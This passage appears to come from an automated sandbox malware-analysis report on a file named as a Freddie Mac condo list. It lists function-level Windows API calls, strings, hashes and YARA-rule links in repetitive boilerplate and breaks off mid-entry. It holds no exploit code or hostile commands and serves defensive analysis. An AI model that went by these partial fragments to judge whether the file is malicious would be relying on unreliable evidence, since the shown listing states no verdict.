API String ID: 3490077880-2889622443
Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00409F28
FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009

Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

MZP, xrefs: 00409FCF

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E

Uniqueness

Uniqueness Score: -1.00%

Function 004785F8, Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32 ref: 00478619
UnregisterClassW.USER32 ref: 00478642
RegisterClassW.USER32 ref: 0047864C
SetWindowLongW.USER32 ref: 00478697

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
Opcode Fuzzy Hash: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 006ACABC, Relevance: 6.0, APIs: 4, Instructions: 34
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 006ACADC
GetLastError.KERNEL32 ref: 006ACAE6
GetTickCount.KERNEL32 ref: 006ACAF0
Sleep.KERNEL32(00000032), ref: 006ACB00

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: 35463e065a5527016ee7a4c963826ed0809ea6ef911f6ad4ecb47253f51cee1b
Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
Opcode Fuzzy Hash: 35463e065a5527016ee7a4c963826ed0809ea6ef911f6ad4ecb47253f51cee1b
Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576

Uniqueness

Uniqueness Score: -1.00%

Function 006AE3C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendNotifyMessageW.USER32(00090236,00000496,00002711,-00000001), ref: 006AE618

Strings

MS PGothic, xrefs: 006AE46C, 006AE47F
(\m, xrefs: 006AE404, 006AE418, 006AE50E, 006AE527, 006AE540, 006AE559, 006AE572, 006AE5BD, 006AE5D3, 006AE5E9

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: MessageNotifySend
String ID: (\m$MS PGothic
API String ID: 3556456075-219475269
Opcode ID: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
Opcode Fuzzy Hash: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0060D530, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581

Strings

.tmp, xrefs: 0060D561

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 7adf05a90e5515b20f2e0cb1ccbcbaba2eca0b5d3a9ecc1b0ada5aca51d466d3
Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
Opcode Fuzzy Hash: 7adf05a90e5515b20f2e0cb1ccbcbaba2eca0b5d3a9ecc1b0ada5aca51d466d3
Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64

Uniqueness

Uniqueness Score: -1.00%

Function 006ACB10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006ACB58

Strings

Failed to remove temporary directory: , xrefs: 006ACB7A
bm, xrefs: 006ACB3A

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CountTick
String ID: Failed to remove temporary directory: $bm
API String ID: 536389180-2673898769
Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28

Uniqueness

Uniqueness Score: -1.00%

Function 006AC180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2

Strings

RegisteredOwner, xrefs: 006AC1BF
RegisteredOrganization, xrefs: 006AC1D1

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040952E, Relevance: 4.6, APIs: 3, Instructions: 83COMMON

Download Yara Rule

APIs

UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0040959A
UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00009530), ref: 004095D7
RtlUnwind.KERNEL32(?,?,Function_00009530,00000000,?,?,Function_00009530,?), ref: 00409602

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ExceptionFilterUnhandled$Unwind
String ID:
API String ID: 1141220122-0
Opcode ID: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
Instruction ID: e545f85d7011ee45bc6c766d7eccadc728dc4c1814e3ea314169116c21f0ec9d
Opcode Fuzzy Hash: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
Instruction Fuzzy Hash: 8C3180B1604200AFD720DB15CC84F67B7E5EB84714F14896AF408972A3CB39EC84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00414DA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00414DDF

Strings

TWindowDisabler-Window, xrefs: 00414DDD

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateWindow
String ID: TWindowDisabler-Window
API String ID: 716092398-1824977358
Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 006AC0D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9

Uniqueness

Uniqueness Score: -1.00%

Function 005C7A14, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Open
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 71445658-1109908249
Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4

Uniqueness

Uniqueness Score: -1.00%

Function 0060DCC8, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 307229220045934514f2797ae1fd56983498e0d597fc7926d6d01a7b579ae072
Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
Opcode Fuzzy Hash: 307229220045934514f2797ae1fd56983498e0d597fc7926d6d01a7b579ae072
Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 005C77F4, Relevance: 3.1, APIs: 2, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
